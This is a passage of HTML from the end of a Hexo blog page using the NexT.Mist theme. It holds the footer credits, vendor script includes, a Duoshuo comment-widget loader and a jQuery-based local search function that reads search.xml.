  由 <a class="theme-link" href="https://hexo.io">Hexo</a> 强力驱动
</div>

<div class="theme-info">
  主题 -
  <a class="theme-link" href="https://github.com/iissnan/hexo-theme-next">
    NexT.Mist
  </a>
</div>

        

        
      </div>
    </footer>

    <div class="back-to-top">
      <i class="fa fa-arrow-up"></i>
    </div>
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  



  
  <script type="text/javascript" src="/vendors/jquery/index.js?v=2.1.3"></script>

  
  <script type="text/javascript" src="/vendors/fastclick/lib/fastclick.min.js?v=1.0.6"></script>

  
  <script type="text/javascript" src="/vendors/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/vendors/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.0.1"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.0.1"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.0.1"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.0.1"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.0.1"></script>



  

  
    
  

  <script type="text/javascript">
    var duoshuoQuery = {short_name:"ug1y"};
    (function() {
      var ds = document.createElement('script');
      ds.type = 'text/javascript';ds.async = true;
      ds.id = 'duoshuo-script';
      ds.src = (document.location.protocol == 'https:' ? 'https:' : 'http:') + '//static.duoshuo.com/embed.js';
      ds.charset = 'UTF-8';
      (document.getElementsByTagName('head')[0]
      || document.getElementsByTagName('body')[0]).appendChild(ds);
    })();
  </script>

  
    
    <script src="/vendors/ua-parser-js/dist/ua-parser.min.js?v=0.7.9"></script>
    <script src="/js/src/hook-duoshuo.js"></script>
  






  
  
  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length == 0) {
       search_path = "search.xml";
    }
    var path = "/" + search_path;
    // monitor main search box;

    function proceedsearch() {
      $("body").append('<div class="popoverlay">').css('overflow', 'hidden');
      $('.popup').toggle();

    }
    // search function;
    var searchFunc = function(path, search_id, content_id) {
    'use strict';
    $.ajax({
        url: path,
        dataType: "xml",
        async: true,
        success: function( xmlResponse ) {
            // get the contents from search data
            isfetched = true;
            $('.popup').detach().appendTo('.header-inner');
            var datas = $( "entry", xmlResponse ).map(function() {
                return {
                    title: $( "title", this ).text(),
                    content: $("content",this).text(),
                    url: $( "url" , this).text()
                };
            }).get();
            var $input = document.getElementById(search_id);
            var $resultContent = document.getElementById(content_id);
            $input.addEventListener('input', function(){
                var matchcounts = 0;
                var str='<ul class=\"search-result-list\">';
                var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                $resultContent.innerHTML = "";
                if (this.value.trim().length > 1) {
                // perform local searching
                datas.forEach(function(data) {
                    var isMatch = true;
                    var content_index = [];
                    var data_title = data.title.trim().toLowerCase();
                    var data_content = data.content.trim().replace(/<[^>]+>/g,"").toLowerCase();
                    var data_url = data.url;
                    var index_title = -1;
                    var index_content = -1;
                    var first_occur = -1;
                    // only match artiles with not empty titles and contents
                    if(data_title != '' && data_content != '') {
                        keywords.forEach(function(keyword, i) {
                            index_title = data_title.indexOf(keyword);
                            index_content = data_content.indexOf(keyword);
                            if( index_title < 0 && index_content < 0 ){
                                isMatch = false;
                            } else {
                                if (index_content < 0) {
                                    index_content = 0;
                                }
                                if (i == 0) {
                                    first_occur = index_content;
                                }
                            }
                        });
                    }
                    // show search results
                    if (isMatch) {
                        matchcounts += 1;
                        str += "<li><a href='"+ data_url +"' class='search-result-title'>"+ data_title +"</a>";
                        var content = data.content.trim().replace(/<[^>]+>/g,"");
                        if (first_occur >= 0) {
                            // cut out 100 characters
                            var start = first_occur - 20;
                            var end = first_occur + 80;
                            if(start < 0){
                                start = 0;
                            }
                            if(start == 0){
                                end = 50;
                            }
                            if(end > content.length){
                                end = content.length;
                            }
                            var match_content = content.substring(start, end);
                            // highlight all keywords
                            keywords.forEach(function(keyword){
                                var regS = new RegExp(keyword, "gi");
                                match_content = match_content.replace(regS, "<b class=\"search-keyword\">"+keyword+"</b>");
                            });

                            str += "<p class=\"search-result\">" + match_content +"...</p>"
                        }
                        str += "</li>";
                    }
                })};
                str += "</ul>";
                if (matchcounts == 0) { str = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>' }
                if (keywords == "") { str = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>' }
                $resultContent.innerHTML = str;
            });
            proceedsearch();
        }
    });}

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched == false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };

    });

    $('.popup-btn-close').click(function(e){
      $('.popup').hide();
      $(".popoverlay").remove();
      $('body').css('overflow', '');
    });
    $('.popup').click(function(e){
      e.stopPropagation();
    });
  </script>


  

  

  

</body>
</html>
